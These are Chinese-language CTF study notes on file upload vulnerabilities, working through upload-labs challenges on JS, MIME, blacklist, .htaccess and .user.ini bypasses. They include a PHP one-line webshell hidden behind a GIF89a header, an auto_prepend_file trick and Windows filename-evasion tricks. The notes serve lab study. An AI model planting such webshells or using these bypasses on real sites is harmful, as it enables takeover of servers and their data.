CTF-Web(3)文件上传漏洞

笔记目录

CTF-Web(2)SQL注入
CTF-Web(3)文件上传漏洞

1.WebShell介绍

---

(1)一句话木马定义

     一种网页后门，以asp、php、jsp等网页文件形式存在的一种命令执行环境，而 一句话木马往往只有一行WebShell代码。

     作用：

• 攻击获得网站控制权限
• 查看、修改、删除网站数据
• 通过提权漏洞可获得主机权限

(2)一句话木马工作原理

• eval函数：把字符串按照PHP代码执行，该字符串必须是合法的PHP代码，且必须以分号结尾。
• $_POST：PHP超全局变量$_GET和$_POST用于收集表单数据。

(3)一句话木马（多整理防止被过滤运行不成功）

①基础版

②替代版

③防过滤版

【精选】PHP一句话木马集合_思源湖的鱼的博客-CSDN博客

2.文件上传漏洞介绍

---

(1)原理

    由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致攻击者能够向某个可通过 Web 访问的目录上传恶意文件，并被脚本解析器执行，这样就可以在远程服务器上执行恶意脚本

(2)文件上传流程：

    ①A 客户端javascript 检测 ( 客户端，通常检测扩展名)

    ②B 服务端MIME 类型检测 (请求Content-Type 内容)

    ③C 服务端目录路径检测 (检测跟path 参数相关的内容)

    ④D 服务端文件扩展名检测(检测跟文件extension 相关的内容)

    ⑤E 服务端文件内容检测（检测内容是否合法，如检测十六进制内容)

(3)漏洞分类

注：如果随便上传奇怪文件后缀，不允许上传为文件白名单(只允许几种后缀通过)，否则为黑名单 (只允许几种后缀不通过)

(4)漏洞类型判断流程

3.漏洞分类（upload-labs靶场）

---

(1)JS前端验证突破（pass-01）

①原理

    如客户端上传文件时，可能现在本地JS验证文件类型是否正确再上传

②攻击方式

• 抓包修改文件名

(2)MIME验证实例（pass-02）

①原理

    服务端对上传文件的Content-Type类型进行检测，判断 是否在 白名单规定内

②攻击方式

• 抓包修改Content-type类型

(3)黑名单--特殊后缀名（pass-03）

• 文件后缀名字典攻击
  • ASP语言类：.asa .cer .cdx
  • PHP语言类: .php3 .php4 .php5 .phtml
  • .net语言类：.ashx
  • jsp语言类：jspx jspf

(4)黑名单--.htaccess（pass-04）

• 上传htaccess文件

(5)黑名单-- .user.ini（pass-05）

• 首先构造.user.ini文件，因为.htaccess在黑名单

  auto_prepend_file=a.jpg

• 然后构造jpg（GIF89a 后期有题目过滤内容） ，此时执行其他php代码都会执行a.jpg内容

GIF89a
<script language='php'>echo 'a.jpg success'; @eval($_POST['pass']);</script>

• 首先构造.user.ini文件

GIF89a
auto_prepend_file=a.jpg

• 将 Content-Type: application/octet-stream 修改为 Content-Type: image/jpg

    

• 最后上传图片代码

• .后缀名+ .[空格]. ，最后只剩下.php（仅适用于windows系统）

    

• 代码没有对空格过滤，可利用windows系统特性，最终上传的文件被去掉了空格

• 文件名后加  ::$DATA 标识， 访问时去掉标识即可